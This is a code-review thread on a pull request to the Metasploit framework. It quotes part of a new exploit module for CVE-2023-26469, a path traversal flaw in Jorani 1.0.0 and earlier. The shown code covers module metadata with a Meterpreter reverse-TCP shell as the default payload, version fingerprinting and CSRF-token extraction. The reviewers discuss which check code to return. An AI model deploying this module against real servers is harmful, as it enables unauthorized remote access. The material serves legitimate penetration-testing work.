modules/exploits/multi/php/jorani_path_trav.rb

```diff
@@ -0,0 +1,164 @@
+          It has been tested on Jorani 1.0.0.
+        ',
+                      'License' => MSF_LICENSE,
+                      'Author' =>
+                        [
+                          'RIOUX Guilhem (jrjgjk)'
+                        ],
+                      'References' =>
+                        [
+                          %w[CVE CVE-2023-26469],
+                          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']
+                        ],
+                      'Platform' => %w[php],
+                      'Arch' => ARCH_PHP,
+                      'Targets' =>
+                        [
+                          ['Jorani <= 1.0.0', {}]
+                        ],
+                      'DefaultOptions' => {
+                        'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+                        'RPORT' => 443,
+                        'SSL' => true
+                      },
+                      'DisclosureDate' => 'Jan 06 2023',
+                      'Privileged' => false,
+                      'DefaultTarget' => 0,
+                      'Notes' =>
+                      {
+                        'Stability' => [CRASH_SAFE],
+                        'Reliability' => [REPEATABLE_SESSION],
+                        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+                      })
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])
+      ]
+    )
+  end
+
+  def get_version(res)
+    matches = res.body.scan(/&nbsp;v([0-9.]+)&nbsp;&copy;/i)
+    if matches[0].nil?
+      print_error('Cannot recovered Jorani version...')
+      return nil
+    end
+    matches[0][0]
+  end
+
+  def service_running(res)
+    matches = res.body.scan(/Leave Management System/)
+    if matches[0].nil?
+      print_error("Jorani doesn't appears to be running on the target")
+      return false
+    end
+    true
+  end
+
+  def recover_csrf(res)
+    matches = res.body.scan(/<input type="hidden" name="csrf_test_jorani" value="(.*?)"/)
+    return matches[0][0] if matches.length == 1 && matches[0].length == 1
+
+    ''
+  end
+
+  def check
+    # For the check command
+    print_status('Checking Jorani version')
+    uri = normalize_uri(target_uri.path, 'index.php')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => "#{uri}/session/login"
+    )
+
+    return Exploit::CheckCode::Safe unless service_running(res)
+
+    print_good('Jorani seems to be running on the target !')
+
+    current_version = get_version(res)
+    return Exploit::CheckCode::Detected if current_version.nil?
+
+    print_good("Found version: #{current_version}")
+    current_version = Gem::Version.new(current_version)
+
+    return Exploit::CheckCode::Vulnerable if current_version <= Gem::Version.new('1.0.0')
```

Comment:
```suggestion
    return Exploit::CheckCode::Appears if current_version <= Gem::Version.new('1.0.0')
```
When we're just checking a version we assert the `Appears` check code, when the check method exploits the vulnerability we assert the `Vulnerable` check code

Reply:
Suggested change implemented with https://github.com/rapid7/metasploit-framework/pull/18123/commits/8cae031d9765e7a400adff5fb12efb2c9b5fd441, however I do wonder if this should be changed to `< Gem::Version.new('1.0.2')` instead now that we know which version was patched.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/18123/commits/1b7e1343f888ed5266fa44552262af54cb9f956d